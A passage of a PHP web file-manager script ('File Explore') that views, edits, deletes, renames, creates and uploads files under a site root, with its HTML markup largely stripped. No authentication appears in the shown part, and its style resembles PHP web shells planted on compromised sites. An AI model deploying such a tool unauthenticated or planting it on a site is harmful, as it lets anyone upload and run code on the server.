= 1048576) { return round($bytes / 1048576, 2) . ' MB'; } return round($bytes / 1024, 2) . ' KB'; } function viewUrl($file) { return $_SERVER['PHP_SELF'] . '?view=' . rawurlencode(b64($file)); } function editUrl($file, $dir) { return $_SERVER['PHP_SELF'] . '?edit=' . rawurlencode(b64($file)) . '&d=' . rawurlencode(b64($dir)); } $currentDir = getRequestedDir(); $dir = $currentDir; // Kept for compatibility with old code. // View file as text / inline content. if (isset($_GET['view'])) { $decoded = decodePathValue($_GET['view']); $filePath = $decoded !== false ? safeFile($decoded) : false; if ($filePath === false) { http_response_code(403); echo 'Access denied'; exit; } $mime = function_exists('mime_content_type') ? mime_content_type($filePath) : 'application/octet-stream'; if ($mime === false || $mime === '') { $mime = 'application/octet-stream'; } header('Content-Type: ' . $mime); header('Content-Disposition: inline; filename="' . basename($filePath) . '"'); header('Content-Length: ' . filesize($filePath)); readfile($filePath); exit; } // Delete file. if (isset($_POST['del'])) { $decoded = decodePathValue($_POST['del']); $filePath = $decoded !== false ? safeFile($decoded) : false; if ($filePath === false) { redirectToDir($currentDir, 'Access denied'); } $fileDir = dirname($filePath); if (@unlink($filePath)) { redirectToDir($fileDir, 'Delete successful'); } redirectToDir($fileDir, 'Delete failed'); } // Save edited file. if (isset($_POST['save'], $_POST['obj'], $_POST['content'])) { $decoded = decodePathValue($_POST['obj']); $filePath = $decoded !== false ? safeFile($decoded) : false; if ($filePath === false) { redirectToDir($currentDir, 'Access denied'); } $fileDir = dirname($filePath); if (file_put_contents($filePath, $_POST['content']) !== false) { redirectToDir($fileDir, 'Saved'); } redirectToDir($fileDir, 'Save failed'); } // Rename file or folder. if (isset($_POST['ren'], $_POST['new'])) { $decoded = decodePathValue($_POST['ren']); $oldPath = $decoded !== false ? safeExistingPath($decoded) : false; if ($oldPath === false) { redirectToDir($currentDir, 'Access denied'); } $oldDir = dirname($oldPath); $newPath = safeChildPath($oldDir, $_POST['new']); if ($newPath === false) { redirectToDir($oldDir, 'Invalid new name'); } if (file_exists($newPath)) { redirectToDir($oldDir, 'Rename failed - target already exists'); } if (@rename($oldPath, $newPath)) { redirectToDir($oldDir, 'Renamed'); } redirectToDir($oldDir, 'Rename failed'); } // Create folder. if (isset($_POST['create_dir'], $_POST['new_dir_name'])) { $newDirPath = safeChildPath($currentDir, $_POST['new_dir_name']); if ($newDirPath === false) { redirectToDir($currentDir, 'Invalid folder name'); } if (file_exists($newDirPath)) { redirectToDir($currentDir, 'Folder already exists'); } if (@mkdir($newDirPath, 0755)) { redirectToDir($currentDir, 'Folder created'); } redirectToDir($currentDir, 'Create folder failed'); } // Create file. if (isset($_POST['create_file'], $_POST['new_file_name'])) { $newFilePath = safeChildPath($currentDir, $_POST['new_file_name']); if ($newFilePath === false) { redirectToDir($currentDir, 'Invalid file name'); } if (file_exists($newFilePath)) { redirectToDir($currentDir, 'File already exists'); } if (file_put_contents($newFilePath, '') !== false) { redirectToDir($currentDir, 'File created'); } redirectToDir($currentDir, 'Create file failed'); } // Upload file. if (isset($_POST['s'], $_FILES['u'])) { if ($_FILES['u']['error'] !== UPLOAD_ERR_OK) { redirectToDir($currentDir, 'Upload failed'); } $fileName = basename($_FILES['u']['name']); $tmpName = $_FILES['u']['tmp_name']; $destination = safeChildPath($currentDir, $fileName); if ($destination === false) { redirectToDir($currentDir, 'Access denied'); } if (!is_uploaded_file($tmpName)) { redirectToDir($currentDir, 'Invalid upload'); } if (@move_uploaded_file($tmpName, $destination)) { redirectToDir($currentDir, 'Upload successful'); } redirectToDir($currentDir, 'Upload failed - cannot write file'); } // Edit file screen. $editFilePath = false; if (isset($_GET['edit'])) { $decoded = decodePathValue($_GET['edit']); $editFilePath = $decoded !== false ? safeFile($decoded) : false; if ($editFilePath === false) { redirectToDir($currentDir, 'Access denied'); } $currentDir = dirname($editFilePath); } $message = isset($_GET['m']) ? trim((string) $_GET['m']) : ''; ?> File Explore
Current directory: [site root]/'; $relativePath = trim(substr($currentDir, strlen($ROOT_DIR)), '/'); if ($relativePath !== '') { $parts = explode('/', $relativePath); $buildPath = $ROOT_DIR; foreach ($parts as $part) { $buildPath .= '/' . $part; echo '' . h($part) . '/'; } } ?>

Back Editing:

Upload:
Create folder:
Create file:
'; echo 'NameSizeAction'; foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $fullPath = safeExistingPath($currentDir . '/' . $item); if ($fullPath === false) { continue; } echo ''; if (is_dir($fullPath)) { echo 'dir> ' . h($item) . ''; echo '--'; echo ''; echo '
'; echo ''; echo ''; echo ''; echo ' '; echo '
'; echo ''; } else { echo 'fil> ' . h($item) . ''; echo '' . h(humanFileSize($fullPath)) . ''; echo ''; echo 'Open | '; echo 'Edit | '; echo '
'; echo ''; echo ''; echo ''; echo '
'; echo ' | '; echo '
'; echo ''; echo ''; echo ''; echo ' '; echo '
'; echo ''; } echo ''; } echo ''; } else { echo '
Unable to read directory!
'; } ?>